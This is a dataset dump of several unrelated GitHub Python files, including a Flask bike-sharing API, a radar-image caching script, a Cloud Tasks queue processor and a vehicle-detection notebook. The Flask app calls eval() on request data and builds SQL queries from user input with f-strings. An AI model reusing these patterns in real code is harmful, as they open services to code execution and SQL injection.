)\")\n \n \n readfile_func(path_dir+\"/\"+file)\n \n \n current_time = helpers.get_current_time()\n print(\"Analysing of file : \"+path_dir+\"/\"+file+\" completed ...\"+\" (End Time = \"+current_time+\" )\")\n \n idf = helpers.compute_idf(corpus)\n \n # finding normailised tf-idf for each word in the corpus\n for doc in corpus:\n helpers.compute_weights(idf,doc)\n helpers.normalize(doc)\n \n \n # Bulding inverted index\n print(\"building inverted index ...\")\n current_time = helpers.get_current_time()\n print(\"Building inverted index started at \"+current_time)\n \n inverted_index = helpers.build_inverted_index(idf, corpus, doc_id_list)\n \n current_time = helpers.get_current_time()\n print(\"Building inverted index completed at \"+current_time)\n \n \n # writing data to file\n \n print(\"Writing data to files ...\")\n current_time = helpers.get_current_time()\n print(\"Writing data in files started at \"+current_time)\n \n file_key = open(out_file+\".dict\",\"w\")\n \n file_postings = open(out_file+\".idx\",\"wb\")\n \n \n for word in idf.keys():\n file_key.write(word + '\\n')\n \n for i in inverted_index.items():\n pickle.dump(i,file_postings)\n \n \n file_key.close()\n file_postings.close()\n \n current_time = helpers.get_current_time()\n print(\"Writing data in files completed at \"+current_time)\n \n# main function\nif __name__ == \"__main__\":\n print(\"indexing Data.....\")\n main(sys.argv[1:])","repo_name":"rajatb115/Vector-Space-Retrieval","sub_path":"invidx_cons.py","file_name":"invidx_cons.py","file_ext":"py","file_size_in_byte":8046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"8279847627","text":"import requests # pip install requests\nimport json\nimport urllib.request\nfrom aiogram import types\n\nfrom config import BALABOLA_URL\n\ndef get_congratulation(name: types.Message) -> types.Message:\n headers = {\n 'Content-Type': 'application/json',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit/605.1.15 '\n '(KHTML, like Gecko) Version/14.1.1 Safari/605.1.15',\n 'Origin': 'https://yandex.ru',\n 'Referer': 'https://yandex.ru/',\n }\n\n payload = {\"query\": name, \"intro\": 20, \"filter\": 1}\n params = json.dumps(payload).encode('utf8')\n req = urllib.request.Request(BALABOLA_URL, data=params, headers=headers)\n response = urllib.request.urlopen(req)\n\n r = json.loads(response.read().decode('utf8'))\n\n return f\"{r['text']}\"","repo_name":"njarkih/tbot_happyny","sub_path":"app/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"70077389840","text":"import sqlite3\nimport requests\nfrom tqdm import tqdm\n\nfrom flask import Flask, request\nimport json \nimport numpy as np\nimport pandas as pd\n\napp = Flask(__name__)\n\n@app.route('/')\ndef home():\n return 'Hello World'\n\n@app.route('/stations/')\ndef route_all_stations():\n conn = make_connection()\n stations = get_all_stations(conn)\n return stations.to_json()\n\n@app.route('/stations/')\ndef route_stations_id(station_id):\n conn = make_connection()\n station = get_station_id(station_id, conn)\n return station.to_json()\n\n@app.route('/trips/')\ndef route_all_trips():\n conn = make_connection()\n trips = get_all_trips(conn)\n return trips.to_json()\n\n@app.route('/trips/')\ndef route_trip_id(trip_id):\n conn = make_connection()\n trips = get_trip_id(trip_id, conn)\n return trips.to_json()\n\n@app.route('/stations/add', methods=['POST']) \ndef route_add_station():\n # parse and transform incoming data into a tuple as we need \n data = pd.Series(eval(request.get_json(force=True)))\n data = tuple(data.fillna('').values)\n\n conn = make_connection()\n result = insert_into_stations(data, conn)\n return result\n\n@app.route('/trips/add', methods=['POST']) \ndef route_add_trips():\n # parse and transform incoming data into a tuple as we need \n data = pd.Series(eval(request.get_json(force=True)))\n data = tuple(data.fillna('').values)\n\n conn = make_connection()\n result = insert_into_trips(data, conn)\n return result\n\n@app.route('/trips/average_duration_trips')\ndef route_average_duration_trips():\n conn = make_connection()\n trips = get_avg_duration_trips(conn)\n return trips.to_json()\n\n@app.route('/trips/average_duration/')\ndef route_avg_duration_by_id(bike_id):\n conn = make_connection()\n trips = get_avg_duration_by_id(bike_id,conn)\n return trips.to_json()\n\n@app.route('/rent_activities_in_period', methods=['POST'])\ndef route_rent_activities_in_period():\n input_data = request.get_json(force=True) # Get the input as dictionary\n specified_date = input_data['period'] # Select specific items (period) from the dictionary\n\n conn = make_connection()\n query = f\"\"\"\n SELECT * FROM trips\n WHERE start_time LIKE ({'\"'+specified_date+'%'+'\"'})\"\"\"\n \n selected_data = pd.read_sql_query(query, conn)\n\n # Make the aggregate\n result = selected_data.groupby('start_station_id').agg({\n 'bikeid' : 'count', \n 'duration_minutes' : 'mean'\n })\n\n # Return the result\n return result.to_json()\n\n@app.route('/json', methods=['POST']) \ndef json_example():\n\n req = request.get_json(force=True) # Parse the incoming json data as Dictionary\n\n name = req['name']\n age = req['age']\n address = req['address']\n\n return (f'''Hello {name}, your age is {age}, and your address in {address}\n ''')\n\n# Functions\ndef get_all_stations(conn):\n query = f\"\"\"SELECT * FROM stations\"\"\"\n result = pd.read_sql_query(query, conn)\n return result\n\ndef make_connection():\n connection = sqlite3.connect('austin_bikeshare.db')\n return connection\n\ndef get_station_id(station_id, conn):\n query = f\"\"\"SELECT * FROM stations WHERE station_id = {station_id}\"\"\"\n result = pd.read_sql_query(query, conn)\n return result\n\ndef get_all_trips(conn):\n query = f\"\"\"SELECT * FROM trips\"\"\"\n result = pd.read_sql_query(query, conn)\n return result\n\ndef get_trip_id(trip_id, conn):\n query = f\"\"\"SELECT * FROM trips WHERE id = {trip_id}\"\"\"\n result = pd.read_sql_query(query, conn)\n return result\n\ndef insert_into_stations(data, conn):\n query = f\"\"\"INSERT INTO stations values {data}\"\"\"\n try:\n conn.execute(query)\n except:\n return 'Error'\n conn.commit()\n return 'Successful!'\n\ndef insert_into_trips(data, conn):\n query = f\"\"\"INSERT INTO trips values {data}\"\"\"\n try:\n conn.execute(query)\n except:\n return 'Error'\n conn.commit()\n return 'Successful!'\n\ndef get_avg_duration_trips(conn):\n query = f\"\"\"\n SELECT start_station_name, avg(duration_minutes) as avg_duration_minutes\n FROM trips\n GROUP BY start_station_name\"\"\"\n result = pd.read_sql_query(query, conn)\n return result\n\ndef get_avg_duration_by_id(bike_id,conn):\n query = f\"\"\"\n SELECT bikeid, avg(duration_minutes) as avg_duration_minutes\n FROM trips\n WHERE bikeid = {'\"'+bike_id+'\"'}\n \"\"\"\n result = pd.read_sql_query(query, conn)\n return result\n\nif __name__ == '__main__':\n app.run(debug=True, port=5000)","repo_name":"jfachrel/Bike-Sharing-API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"12531559245","text":"import numpy\ndef matrizTranspuesta():\n# se solicita al usuario el numero de columnas de las matrices\n col = int(input(\"NUMERO DE FILAS:\"))\n # se solicita al usuario el numero de filas de las matrices\n row = int(input(\"NUMERO DE COLUMNAS:\"))\n # Se declara la primer matriz con el num de filas y columnas dados por el usuario\n matriz1 = [[0 for x in range(row)] for y in range(col)]\n print(\"PRIMER MATRIZ\")\n # Se utiliza un ciclo para solicitar los valores de la primer matriz\n for i in range(col):\n for j in range(row):\n matriz1[i][j] = float(input(\"Valor[\" + str(i) + \"][\" + str(j) + \"]:\"))\n print(\"Matriz normal:\")\n for i in matriz1:\n print(i)\n row = len(matriz1)\n col = len(matriz1[0])\n return [[matriz1[j][i] for j in range(row)] for i in range(col)]\n\nmat=matrizTranspuesta()\nprint(\"Matriz transpuesta: \")\nfor i in mat:\n print(i)","repo_name":"alexact/metodosnumericosbackend","sub_path":"matrices/matrices/matrizTranspuesta.py","file_name":"matrizTranspuesta.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"2351076862","text":"\"\"\"Cache NEXRAD composites for the website.\"\"\"\nimport tempfile\nimport os\nimport subprocess\nimport sys\n\nimport requests\nfrom pyiem.util import get_dbconn, exponential_backoff, utc, logger\n\nLOG = logger()\nN0QBASE = utc(2010, 11, 14)\n\n\ndef save(sectorName, file_name, dir_name, ts, bbox=None, routes=\"ac\"):\n \"\"\" Get an image and write it back to LDM for archiving \"\"\"\n tstamp = ts.strftime(\"%Y%m%d%H%M\")\n nexrad = \"nexrad\" if ts < N0QBASE else \"n0q\"\n layers = (\n \"layers[]=%s&layers[]=watch_by_county&layers[]=sbw&\"\n \"layers[]=uscounties\"\n ) % (nexrad,)\n if sectorName == \"conus\":\n layers = (\n \"layers[]=%s&layers[]=watch_by_county&layers[]=uscounties\"\n ) % (nexrad,)\n uri = (\"http://iem.local/GIS/radmap.php?sector=%s&ts=%s&%s\") % (\n sectorName,\n tstamp,\n layers,\n )\n if bbox is not None:\n uri = (\"http://iem.local/GIS/radmap.php?bbox=%s&ts=%s&%s\") % (\n bbox,\n tstamp,\n layers,\n )\n req = exponential_backoff(requests.get, uri, timeout=60)\n LOG.debug(uri)\n if req is None or req.status_code != 200:\n LOG.info(\"%s failure\", uri)\n return\n\n tmpfd = tempfile.NamedTemporaryFile(delete=False)\n tmpfd.write(req.content)\n tmpfd.close()\n\n cmd = (\"pqinsert -p 'plot %s %s %s %s/n0r_%s_%s.png \" \"png' %s\") % (\n routes,\n tstamp,\n file_name,\n dir_name,\n tstamp[:8],\n tstamp[8:],\n tmpfd.name,\n )\n subprocess.call(cmd, shell=True)\n os.unlink(tmpfd.name)\n\n\ndef runtime(ts):\n \"\"\" Actually run for a time \"\"\"\n pgconn = get_dbconn(\"postgis\")\n pcursor = pgconn.cursor()\n\n save(\"conus\", \"uscomp.png\", \"usrad\", ts)\n save(\"iem\", \"mwcomp.png\", \"comprad\", ts)\n for i in [\"lot\", \"ict\", \"sd\", \"hun\"]:\n save(i, \"%scomp.png\" % (i,), \"%srad\" % (i,), ts)\n\n # Now, we query for watches.\n pcursor.execute(\n \"\"\"\n select sel, ST_xmax(geom), ST_xmin(geom),\n ST_ymax(geom), ST_ymin(geom) from watches_current\n ORDER by issued DESC\n \"\"\"\n )\n for row in pcursor:\n xmin = float(row[2]) - 0.75\n ymin = float(row[4]) - 0.75\n xmax = float(row[1]) + 0.75\n ymax = float(row[3]) + 1.5\n bbox = \"%s,%s,%s,%s\" % (xmin, ymin, xmax, ymax)\n sel = row[0].lower()\n save(\"custom\", \"%scomp.png\" % (sel,), \"%srad\" % (sel,), ts, bbox)\n\n\ndef main(argv):\n \"\"\"Go Main Go\"\"\"\n ts = utc()\n if len(argv) == 6:\n ts = utc(\n int(argv[1]),\n int(argv[2]),\n int(argv[3]),\n int(argv[4]),\n int(argv[5]),\n )\n runtime(ts)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","repo_name":"stormchas4/iem","sub_path":"scripts/dl/radar_composite.py","file_name":"radar_composite.py","file_ext":"py","file_size_in_byte":2717,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"29"} +{"seq_id":"22581337371","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n (\"twitter\", \"0008_remove_user_twitter_id_str\"),\n ]\n\n operations = [\n migrations.AddField(\n model_name=\"account\",\n name=\"last_fetch_id\",\n field=models.BigIntegerField(\n help_text=b\"The Twitter ID of the most recent Tweet fetched.\",\n null=True,\n blank=True,\n ),\n ),\n ]\n","repo_name":"philgyford/django-ditto","sub_path":"ditto/twitter/migrations/0009_account_last_fetch_id.py","file_name":"0009_account_last_fetch_id.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"29"} +{"seq_id":"25928593303","text":"from dataclasses import dataclass\nimport itertools\nimport json\nimport logging\nfrom time import sleep\nimport typing\nfrom typing import Generator\n\nfrom google.cloud.tasks_v2 import CloudTasksClient\nfrom google.cloud.tasks_v2.types import Task\n\nfrom pcapi import settings\nfrom pcapi.core.external import batch as batch_operations\nfrom pcapi.core.external.attributes.api import get_user_attributes\nfrom pcapi.core.users.models import User\nfrom pcapi.notifications.push import update_users_attributes\nfrom pcapi.notifications.push.backends import batch as batch_backend\n\n\nlogger = logging.getLogger(__name__)\n\n\n@dataclass\nclass UserTask:\n user_id: int\n task_name: str\n\n\nUsersTaskGenerator = typing.Generator[UserTask, None, None]\n\n\ndef get_users_task_chunks(users_tasks: UsersTaskGenerator, chunk_size: int) -> Generator[list[UserTask], None, None]:\n \"\"\"\n Build chunks of UserTask from UserTask generator\n \"\"\"\n while True:\n chunk = list(itertools.islice(users_tasks, chunk_size))\n if chunk:\n yield chunk\n\n if len(chunk) < chunk_size:\n break\n\n\ndef format_batch_users(users: list[User]) -> list[batch_backend.UserUpdateData]:\n \"\"\"\n Format user data for the request to the Batch API\n \"\"\"\n res = []\n for user in users:\n attributes = batch_operations.format_user_attributes(get_user_attributes(user))\n res.append(batch_backend.UserUpdateData(user_id=str(user.id), attributes=attributes))\n print(f\"{len(res)} users formatted for batch...\")\n return res\n\n\ndef get_client() -> CloudTasksClient:\n return CloudTasksClient()\n\n\ndef fetch_user_ids_from_tasks(client: CloudTasksClient, parent: str) -> UsersTaskGenerator:\n \"\"\"\n Extract user ids from a Cloud Tasks' queue's tasks\n \"\"\"\n request = {\n \"parent\": parent,\n \"response_view\": Task.View.FULL,\n }\n\n for task in client.list_tasks(request=request):\n try:\n payload = json.loads(task.http_request.body)\n except Exception: # pylint: disable=broad-except\n logger.exception(\"Failed to parse task's http request's body\", extra={\"task\": task.name})\n else:\n yield UserTask(user_id=payload[\"user_id\"], task_name=task.name)\n\n\ndef delete_tasks(client: CloudTasksClient, task_names: set[str]) -> set[str]:\n deleted_tasks = set()\n\n for task_name in task_names:\n try:\n client.delete_task(name=task_name)\n except Exception: # pylint: disable=broad-except\n logger.exception(\"Failed to delete task\", extra={\"task\": task_name})\n else:\n deleted_tasks.add(task_name)\n\n print(f\"deleted {len(deleted_tasks)} / {len(task_names)} tasks\")\n return deleted_tasks\n\n\ndef unstack_batch_queue(queue_name: str, chunk_size: int = 1_000, sleep_time: float = 2.0) -> tuple[set[str], set[str]]:\n \"\"\"\n Process update user attributes tasks from Cloud task queue:\n\n * fetch tasks information from a Cloud Task queue,\n * extract user ids from it,\n * call Batch API to update users attributes,\n * delete tasks from the queue.\n\n Notes:\n This function should be called when the queue is paused.\n Check out Google's documentation for more information:\n https://cloud.google.com/python/docs/reference/cloudtasks/latest/google.cloud.tasks_v2.services.cloud_tasks.CloudTasksClient\n\n Args:\n queue_name: queue name (not full path, only the name)\n chunk_size: number of users per request to the Batch API,\n defaults to 1_000 (Batch API's max value accepted)\n sleep_time: sleep time in seconds, between to request to the\n Batch API (avoids spamming the API)\n\n Returns:\n 2-item tuple: 1) set of extracted tasks names, 2) set of deleted\n tasks names. If nothing went wront both should be equal.\n \"\"\"\n print(\"Starting...\")\n\n client = get_client()\n tasks_to_delete = set()\n\n parent = client.queue_path(settings.GCP_PROJECT, settings.GCP_REGION_CLOUD_TASK, queue_name)\n for users_task_chunk in get_users_task_chunks(fetch_user_ids_from_tasks(client, parent), chunk_size):\n try:\n user_ids = {item.user_id for item in users_task_chunk}\n users = User.query.filter(User.id.in_(user_ids)).all()\n except Exception: # pylint: disable=broad-except\n logger.exception(\"Failed to fetch users from chunk\", extra={\"chunk_size\": len(users_task_chunk)})\n continue\n\n try:\n batch_users_data = format_batch_users(users)\n update_users_attributes(batch_users_data)\n except Exception: # pylint: disable=broad-except # pylint: disable=broad-except\n logger.exception(\"Failed to update users attributes\", extra={\"chunk_size\": len(users_task_chunk)})\n continue\n\n tasks_to_delete |= {item.task_name for item in users_task_chunk}\n print(f\"chunk of {len(users_task_chunk)} users... done\")\n\n sleep(sleep_time)\n\n deleted_tasks = delete_tasks(client, tasks_to_delete)\n print(\"End\")\n\n return tasks_to_delete, deleted_tasks\n","repo_name":"pass-culture/pass-culture-main","sub_path":"api/src/pcapi/scripts/external_users/unstack_batch_cloud_task_queue.py","file_name":"unstack_batch_cloud_task_queue.py","file_ext":"py","file_size_in_byte":5130,"program_lang":"python","lang":"en","doc_type":"code","stars":86,"dataset":"github-code","pt":"29"} +{"seq_id":"24132227357","text":"\n# coding: utf-8\n\n# # Self-Driving Car Engineer Nanodegree\n# \n# \n# ## Project: Vehicle Detection and Tracking** \n# ***\n\n# ## Model Code\n\n# In[1]:\n\n### Import the libraries\n\nimport numpy as np\nimport cv2\nimport glob\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nimport pickle\nimport os\nimport time\nfrom skimage.feature import hog\nfrom sklearn.svm import LinearSVC\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\nfrom scipy.ndimage.measurements import label\n\n# Import everything needed to edit/save/watch video clips\nfrom moviepy.editor import VideoFileClip\nfrom IPython.display import HTML\n\nprint(\"done\")\n\n\n# In[2]:\n\n### Build Images Variables\n\n#Vehicle images\nbasedir = 'dataset/vehicles/vehicles/'\nimage_types = os.listdir(basedir)\ncars = []\nfor imtype in image_types:\n cars.extend(glob.glob(basedir+imtype+'/*'))\n \nprint('Number of Vehicle Images found:', len(cars))\nwith open(\"cars.txt\", 'w') as f:\n for fn in cars:\n f.write(fn+'\\n')\n \n#Non-vehicle images\nbasedir = 'dataset/non-vehicles/non-vehicles/'\nimage_types = os.listdir(basedir)\nnotcars = []\nfor imtype in image_types:\n notcars.extend(glob.glob(basedir+imtype+'/*'))\n \nprint('Number of Non-Vehicle Images found:', len(notcars))\nwith open(\"notcars.txt\", 'w') as f:\n for fn in notcars:\n f.write(fn+'\\n')\n \nprint(\"done\") \n\n\n# In[3]:\n\n### Define Functions\n\n#def convert_color(img, conv='RGB2YCrCb'):\n# if conv == 'RGB2YCrCb':\n# return cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n# if conv == 'BGR2YCrCb':\n# return cv2.cvtColor(img, cv2.COLOR_BGR2YCrCb)\n# if conv == 'RGB2LUV':\n# return cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n#\n#\n\n# Define a function to return HOG features and visualization\ndef get_hog_features(img, orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True):\n # Call with two outputs if vis==True\n if vis == True:\n features, hog_image = hog(img, orientations=orient, \n pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), \n transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features, hog_image\n # Otherwise call with one output\n else: \n features = hog(img, orientations=orient, \n pixels_per_cell=(pix_per_cell, pix_per_cell),\n cells_per_block=(cell_per_block, cell_per_block), \n transform_sqrt=True, \n visualise=vis, feature_vector=feature_vec)\n return features\n\ndef bin_spatial(img, size=(32, 32)):\n color1 = cv2.resize(img[:,:,0], size).ravel()\n color2 = cv2.resize(img[:,:,1], size).ravel()\n color3 = cv2.resize(img[:,:,2], size).ravel()\n return np.hstack((color1, color2, color3))\n\n## Define a function to compute binned color features \n#def bin_spatial(img, size=(32, 32)):\n# # Use cv2.resize().ravel() to create the feature vector\n# features = cv2.resize(img, size).ravel() \n# # Return the feature vector\n# return features\n \ndef color_hist(img, nbins=32): #bins_range=(0, 256)\n # Compute the histogram of the color channels separately\n channel1_hist = np.histogram(img[:,:,0], bins=nbins)\n channel2_hist = np.histogram(img[:,:,1], bins=nbins)\n channel3_hist = np.histogram(img[:,:,2], bins=nbins)\n # Concatenate the histograms into a single feature vector\n hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n # Return the individual histograms, bin_centers and feature vector\n return hist_features\n\n## Define a function to compute color histogram features \n## NEED TO CHANGE bins_range if reading .png files with mpimg!\n#def color_hist(img, nbins=32, bins_range=(0, 256)):\n# # Compute the histogram of the color channels separately\n# channel1_hist = np.histogram(img[:,:,0], bins=nbins, range=bins_range)\n# channel2_hist = np.histogram(img[:,:,1], bins=nbins, range=bins_range)\n# channel3_hist = np.histogram(img[:,:,2], bins=nbins, range=bins_range)\n# # Concatenate the histograms into a single feature vector\n# hist_features = np.concatenate((channel1_hist[0], channel2_hist[0], channel3_hist[0]))\n# # Return the individual histograms, bin_centers and feature vector\n# return hist_features\n\n# Define a function to extract features from a list of images\n# Have this function call bin_spatial() and color_hist()\ndef extract_features(imgs, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True):\n # Create a list to append feature vectors to\n features = []\n # Iterate through the list of images\n for file in imgs:\n file_features = []\n # Read in each one by one\n image = mpimg.imread(file)\n # apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(image, cv2.COLOR_RGB2YCrCb)\n else: feature_image = np.copy(image) \n\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n file_features.append(spatial_features)\n if hist_feat == True:\n # Apply color_hist()\n hist_features = color_hist(feature_image, nbins=hist_bins)\n file_features.append(hist_features)\n if hog_feat == True:\n # Call get_hog_features() with vis=False, feature_vec=True\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.append(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True))\n hog_features = np.ravel(hog_features) \n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n # Append the new feature vector to the features list\n file_features.append(hog_features)\n features.append(np.concatenate(file_features))\n # Return list of feature vectors\n return features\n \n# Define a function that takes an image,\n# start and stop positions in both x and y, \n# window size (x and y dimensions), \n# and overlap fraction (for both x and y)\ndef slide_window(img, x_start_stop=[None, None], y_start_stop=[None, None], \n xy_window=(64, 64), xy_overlap=(0.5, 0.5)):\n # If x and/or y start/stop positions not defined, set to image size\n if x_start_stop[0] == None:\n x_start_stop[0] = 0\n if x_start_stop[1] == None:\n x_start_stop[1] = img.shape[1]\n if y_start_stop[0] == None:\n y_start_stop[0] = 0\n if y_start_stop[1] == None:\n y_start_stop[1] = img.shape[0]\n # Compute the span of the region to be searched \n xspan = x_start_stop[1] - x_start_stop[0]\n yspan = y_start_stop[1] - y_start_stop[0]\n # Compute the number of pixels per step in x/y\n nx_pix_per_step = np.int(xy_window[0]*(1 - xy_overlap[0]))\n ny_pix_per_step = np.int(xy_window[1]*(1 - xy_overlap[1]))\n # Compute the number of windows in x/y\n nx_buffer = np.int(xy_window[0]*(xy_overlap[0]))\n ny_buffer = np.int(xy_window[1]*(xy_overlap[1]))\n nx_windows = np.int((xspan-nx_buffer)/nx_pix_per_step) \n ny_windows = np.int((yspan-ny_buffer)/ny_pix_per_step) \n # Initialize a list to append window positions to\n window_list = []\n # Loop through finding x and y window positions\n # Note: you could vectorize this step, but in practice\n # you'll be considering windows one by one with your\n # classifier, so looping makes sense\n for ys in range(ny_windows):\n for xs in range(nx_windows):\n # Calculate window position\n startx = xs*nx_pix_per_step + x_start_stop[0]\n endx = startx + xy_window[0]\n starty = ys*ny_pix_per_step + y_start_stop[0]\n endy = starty + xy_window[1]\n \n # Append window position to list\n window_list.append(((startx, starty), (endx, endy)))\n # Return the list of windows\n return window_list\n\n# Define a function to draw bounding boxes\ndef draw_boxes(img, bboxes, color=(0, 0, 255), thick=6):\n # Make a copy of the image\n imcopy = np.copy(img)\n # Iterate through the bounding boxes\n for bbox in bboxes:\n # Draw a rectangle given bbox coordinates\n cv2.rectangle(imcopy, bbox[0], bbox[1], color, thick)\n # Return the image copy with boxes drawn\n return imcopy\n\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True, vis=False): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n else: feature_image = np.copy(img) \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n #4) Append features to list\n img_features.append(spatial_features)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.extend(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True)) \n else:\n if vis == True:\n hog_features, hog_image = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=True, feature_vec=True)\n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n \n #8) Append features to list\n img_features.append(hog_features)\n\n #9) Return concatenated array of features\n if vis == True:\n return np.concatenate(img_features), hog_image\n else:\n return np.concatenate(img_features)\n\n# Define a function you will pass an image \n# and the list of windows to be searched (output of slide_windows())\ndef search_windows(img, windows, clf, scaler, color_space='RGB', \n spatial_size=(32, 32), hist_bins=32, \n hist_range=(0, 256), orient=9, \n pix_per_cell=8, cell_per_block=2, \n hog_channel=0, spatial_feat=True, \n hist_feat=True, hog_feat=True):\n\n #1) Create an empty list to receive positive detection windows\n on_windows = []\n #2) Iterate over all windows in the list\n for window in windows:\n #3) Extract the test window from original image\n test_img = cv2.resize(img[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64)) \n #4) Extract features for that window using single_img_features()\n features = single_img_features(test_img, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n #5) Scale extracted features to be fed to classifier\n test_features = scaler.transform(np.array(features).reshape(1, -1))\n #6) Predict using your classifier\n prediction = clf.predict(test_features)\n #7) If positive (prediction == 1) then save the window\n if prediction == 1:\n on_windows.append(window)\n #8) Return windows for positive detections\n return on_windows\n\n#plotting multiple images - based on the tutorial\ndef visualize(fig, rows, cols, imgs, titles):\n for i, img in enumerate(imgs):\n plt.subplot(rows, cols, i+1)\n plt.title(i+1)\n img_dims = len(img.shape)\n if img_dims < 3:\n plt.imshow(img, cmap='hot')\n plt.title(titles[i])\n #plt.imsave('output_images/'+titles[i]+'_test.png',img*255)\n #plt.imsave('output_images/'+titles[i]+'_test.png',cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n #plt.imsave('output_images/'+'title'+'_test.png',car_hog_image, cmap='gray')\n #cv2.imwrite('/output_images/' + titles[i] + '.png',img)\n else:\n plt.imshow(img)\n plt.title(titles[i])\n #plt.imsave('output_images/'+titles[i]+'_test.png',img*255)\n #plt.imsave('output_images/'+titles[i]+'_test.png',cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n #plt.imshow(cv2.cvtColor(img, cv2.COLOR_BGR2RGB))\n #cv2.imwrite('output_images/'+titles[i]+'_test.png',img*255)\n #cv2.imwrite('/output_images/' + titles[i] + '.png',img) \n\nprint(\"done\")\n\n\n# In[4]:\n\n# Use HOG on test images\n\nget_ipython().magic(u'matplotlib inline')\n\n#random indices selection\ncar_ind = np.random.randint(0, len(cars))\nnotcar_ind = np.random.randint(0, len(notcars))\n\n#read images\ncar_image = mpimg.imread(cars[car_ind])\nnotcar_image = mpimg.imread(notcars[notcar_ind])\n\n#tweak these parameters and see how the results change.\ncolor_space = 'RGB' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\n#orient = 9 # HOG orientations\norient = 6 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = 0 # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (16, 16) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\n\ncar_features, car_hog_image = single_img_features(car_image, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat, vis=True)\nnotcar_features, notcar_hog_image = single_img_features(notcar_image, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat, 